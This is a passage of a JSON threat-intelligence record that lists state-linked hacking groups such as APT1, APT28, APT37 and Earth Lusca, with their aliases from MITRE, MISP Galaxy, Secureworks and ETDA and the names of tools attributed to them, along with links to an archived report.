"2023-01-06T13:46:38.228042Z", "updated_at": "2026-04-10T02:00:02.883048Z", "deleted_at": null, "main_name": "APT1", "aliases": [ "PLA Unit 61398", "Comment Crew", "Byzantine Candor", "Comment Group", "GIF89a", "Group 3", "TG-8223", "Brown Fox", "ShadyRAT", "G0006", "COMMENT PANDA" ], "source_name": "MISPGALAXY:APT1", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b43c8747-c898-448a-88a9-76bff88e91b5", "created_at": "2024-02-02T02:00:04.058535Z", "updated_at": "2026-04-10T02:00:03.545252Z", "deleted_at": null, "main_name": "Opal Sleet", "aliases": [ "Konni", "Vedalia", "OSMIUM" ], "source_name": "MISPGALAXY:Opal Sleet", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bbe36874-34b7-4bfb-b38b-84a00b07042e", "created_at": "2022-10-25T15:50:23.375277Z", "updated_at": "2026-04-10T02:00:05.327922Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "APT37", "InkySquid", "ScarCruft", "Group123", "TEMP.Reaper", "Ricochet Chollima" ], "source_name": "MITRE:APT37", "tools": [ "BLUELIGHT", "CORALDECK", "KARAE", "SLOWDRIFT", "ROKRAT", "SHUTTERSPEED", "POORAIM", "HAPPYWORK", "Final1stspy", "Cobalt Strike", "NavRAT", "DOGCALL", "WINERACK" ], "source_id": "MITRE", "reports": null }, { "id": "552ff939-52c3-421b-b6c9-749cbc21a794", "created_at": "2023-01-06T13:46:38.742547Z", "updated_at": "2026-04-10T02:00:03.08515Z", "deleted_at": null, "main_name": "APT37", "aliases": [ "Operation Daybreak", "Red Eyes", "ScarCruft", "G0067", "Group123", "Reaper Group", "Ricochet Chollima", "ATK4", "APT 37", "Operation Erebus", "Moldy Pisces", "APT-C-28", "Group 123", "InkySquid", "Venus 121" ], "source_name": "MISPGALAXY:APT37", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "730dfa6e-572d-473c-9267-ea1597d1a42b", "created_at": "2023-01-06T13:46:38.389985Z", "updated_at": "2026-04-10T02:00:02.954105Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "Pawn Storm", "ATK5", "Fighting Ursa", "Blue Athena", "TA422", "T-APT-12", "APT-C-20", "UAC-0001", "IRON TWILIGHT", "SIG40", "UAC-0028", "Sofacy", "BlueDelta", "Fancy Bear", "GruesomeLarch", "Group 74", "ITG05", "FROZENLAKE", "Forest Blizzard", "FANCY BEAR", "Sednit", "SNAKEMACKEREL", "Tsar Team", "TG-4127", "STRONTIUM", "Grizzly Steppe", "G0007" ], "source_name": "MISPGALAXY:APT28", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "e3767160-695d-4360-8b2e-d5274db3f7cd", "created_at": "2022-10-25T16:47:55.914348Z", "updated_at": "2026-04-10T02:00:03.610018Z", "deleted_at": null, "main_name": "IRON TWILIGHT", "aliases": [ "APT28 ", "ATK5 ", "Blue Athena ", "BlueDelta ", "FROZENLAKE ", "Fancy Bear ", "Fighting Ursa ", "Forest Blizzard ", "GRAPHITE ", "Group 74 ", "PawnStorm ", "STRONTIUM ", "Sednit ", "Snakemackerel ", "Sofacy ", "TA422 ", "TG-4127 ", "Tsar Team ", "UAC-0001 " ], "source_name": "Secureworks:IRON TWILIGHT", "tools": [ "Downdelph", "EVILTOSS", "SEDUPLOADER", "SHARPFRONT" ], "source_id": "Secureworks", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "ae320ed7-9a63-42ed-944b-44ada7313495", "created_at": "2022-10-25T15:50:23.671663Z", "updated_at": "2026-04-10T02:00:05.283292Z", "deleted_at": null, "main_name": "APT28", "aliases": [ "APT28", "IRON TWILIGHT", "SNAKEMACKEREL", "Group 74", "Sednit", "Sofacy", "Pawn Storm", "Fancy Bear", "STRONTIUM", "Tsar Team", "Threat Group-4127", "TG-4127", "Forest Blizzard", "FROZENLAKE", "GruesomeLarch" ], "source_name": "MITRE:APT28", "tools": [ "Wevtutil", "certutil", "Forfiles", "DealersChoice", "Mimikatz", "ADVSTORESHELL", "Komplex", "HIDEDRV", "JHUHUGIT", "Koadic", "Winexe", "cipher.exe", "XTunnel", "Drovorub", "CORESHELL", "OLDBAIT", "Downdelph", "XAgentOSX", "USBStealer", "Zebrocy", "reGeorg", "Fysbis", "LoJax" ], "source_id": "MITRE", "reports": null }, { "id": "3aaf0755-5c9b-4612-9f0e-e266ef1bdb4b", "created_at": "2022-10-25T16:07:23.480196Z", "updated_at": "2026-04-10T02:00:04.626125Z", "deleted_at": null, "main_name": "Comment Crew", "aliases": [ "APT 1", "BrownFox", "Byzantine Candor", "Byzantine Hades", "Comment Crew", "Comment Panda", "G0006", "GIF89a", "Group 3", "Operation Oceansalt", "Operation Seasalt", "Operation Siesta", "Shanghai Group", "TG-8223" ], "source_name": "ETDA:Comment Crew", "tools": [ "Auriga", "Cachedump", "Chymine", "CookieBag", "Darkmoon", "GDOCUPLOAD", "GLOOXMAIL", "GREENCAT", "Gen:Trojan.Heur.PT", "GetMail", "Hackfase", "Hacksfase", "Helauto", "Kurton", "LETSGO", "LIGHTBOLT", "LIGHTDART", "LOLBAS", "LOLBins", "LONGRUN", "Living off the Land", "Lslsass", "MAPIget", "ManItsMe", "Mimikatz", "MiniASP", "Oceansalt", "Pass-The-Hash Toolkit", "Poison Ivy", "ProcDump", "Riodrv", "SPIVY", "Seasalt", "ShadyRAT", "StarsyPound", "TROJAN.COOKIES", "TROJAN.FOXY", "TabMsgSQL", "Tarsip", "Trojan.GTALK", "WebC2", "WebC2-AdSpace", "WebC2-Ausov", "WebC2-Bolid", "WebC2-Cson", "WebC2-DIV", "WebC2-GreenCat", "WebC2-Head", "WebC2-Kt3", "WebC2-Qbp", "WebC2-Rave", "WebC2-Table", "WebC2-UGX", "WebC2-Yahoo", "Wordpress Bruteforcer", "bangat", "gsecdump", "pivy", "poisonivy", "pwdump", "zxdosml" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434530, "ts_updated_at": 1775826723, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.pdf", "text": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.txt", "img": "https://archive.orkl.eu/15830da9eb1ece90c6e53e04e43df3353bc18311.jpg" } }